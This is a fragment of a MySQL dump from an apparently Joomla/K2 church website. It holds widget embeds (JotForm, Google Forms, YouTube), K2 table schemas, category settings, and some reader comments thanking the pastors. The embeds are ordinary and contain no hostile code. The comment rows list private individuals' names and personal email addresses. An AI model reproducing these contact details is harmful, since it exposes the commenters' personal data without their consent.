(7, 'First Timer Form', '', '', '<script src=\"https://form.myjotform.com/static/feedback2.js?3.3.REV\" type=\"text/javascript\">\r\n      new JotformFeedback({\r\n        formId: \"52455229473560\",\r\n        buttonText: \"FIRST TIMERS FORM (Dream Centre Online Church)\",\r\n        base: \"https://form.myjotform.com/\",\r\n        background: \"#F59202\",\r\n        fontColor: \"#FFFFFF\",\r\n        buttonSide: \"bottom\",\r\n        buttonAlign: \"right\",\r\n        type: false,\r\n        width: 700,\r\n        height: 500\r\n      });\r\n    </script>', 0, 0, 1),
(8, 'Partnership Form', '', '', '<iframe src=\"https://docs.google.com/forms/d/e/1FAIpQLSf8XMQVa-0T0W8jyNI2ud8UWrsyeeFF_HG7q5ufrWFfEPEopw/viewform?embedded=true\" width=\"850\" height=\"2800\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\">Loading...</iframe>', 0, 0, 1),
(11, 'Pastoral Training', '', '', '<iframe width=\"854\" height=\"560\" src=\"https://www.youtube.com/embed/95JZMsNdGRY?rel=0\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>', 0, 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_attachments`
--

CREATE TABLE `y57u5_k2_attachments` (
  `id` int(11) NOT NULL,
  `itemID` int(11) NOT NULL,
  `filename` varchar(255) NOT NULL,
  `title` varchar(255) NOT NULL,
  `titleAttribute` text NOT NULL,
  `hits` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_categories`
--

CREATE TABLE `y57u5_k2_categories` (
  `id` int(11) UNSIGNED NOT NULL,
  `name` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `parent` int(11) DEFAULT '0',
  `extraFieldsGroup` int(11) NOT NULL,
  `published` smallint(6) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `image` varchar(255) NOT NULL,
  `params` text NOT NULL,
  `trash` smallint(6) NOT NULL DEFAULT '0',
  `plugins` text NOT NULL,
  `language` char(7) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_categories`
--

INSERT INTO `y57u5_k2_categories` (`id`, `name`, `alias`, `description`, `parent`, `extraFieldsGroup`, `published`, `access`, `ordering`, `image`, `params`, `trash`, `plugins`, `language`) VALUES
(1, 'Healing', 'healing', '', 0, 0, 1, 1, 4, '', '{\"inheritFrom\":\"0\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\"}', 0, '', '*'),
(2, 'Faith', 'faith', '', 0, 0, 1, 1, 3, '', '{\"inheritFrom\":\"0\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"rdate\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\"}', 0, '', '*'),
(3, 'Courtship & Marriage', 'courtship-marriage', '', 0, 0, 1, 1, 2, '', '{\"inheritFrom\":\"0\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\"}', 0, '', '*'),
(4, 'Finances', 'finances', '', 0, 0, 1, 1, 5, '', '{\"inheritFrom\":\"0\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"1\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\"}', 0, '', '*'),
(5, 'Father\'s Heart', 'father-s-heart', '', 0, 0, 1, 1, 1, '', '{\"inheritFrom\":\"0\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"rdate\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"0\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\"}', 0, '', '*'),
(6, 'Family & Women', 'family-women', '', 0, 0, 1, 1, 6, '', '{\"inheritFrom\":\"0\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\"}', 0, '', '*');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_comments`
--

CREATE TABLE `y57u5_k2_comments` (
  `id` int(11) NOT NULL,
  `itemID` int(11) NOT NULL,
  `userID` int(11) NOT NULL,
  `userName` varchar(255) NOT NULL,
  `commentDate` datetime NOT NULL,
  `commentText` text NOT NULL,
  `commentEmail` varchar(255) NOT NULL,
  `commentURL` varchar(255) NOT NULL,
  `published` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_comments`
--

INSERT INTO `y57u5_k2_comments` (`id`, `itemID`, `userID`, `userName`, `commentDate`, `commentText`, `commentEmail`, `commentURL`, `published`) VALUES
(25, 10, 0, 'Steve', '2017-01-14 00:55:16', 'You are bless Daddy and Mummy.', 'stevade99@yahoo.com', '', 1),
(26, 16, 0, 'Banji', '2017-01-15 20:46:25', 'Thank you daddy and mummy', 'Banji@gmail.com', '', 1),
(27, 12, 0, 'Olawoye Moses', '2017-01-15 20:48:44', 'Thank you Daddy. Thank you Mummy', 'oluwakomiyo@gmail.com', '', 1),
(7, 10, 0, 'Komolafe Dare Emmanuel ', '2017-01-04 15:33:59', 'Thanks Daddy  and Mummy.', 'Kedunited@yahoo.com', '', 1),
(8, 12, 0, 'Sunday Ogunade ', '2017-01-04 15:59:04', 'Thank you Daddy and Mummy for this revelation.', 'ogunadesunday2000@gmail.com ', '', 1),
(9, 12, 0, 'Emmanuel', '2017-01-04 17:29:15', 'The message is loaded.\r\nThanks.\r\nMore grace.', 'olaemmanueltaye@gmail.com', '', 1),
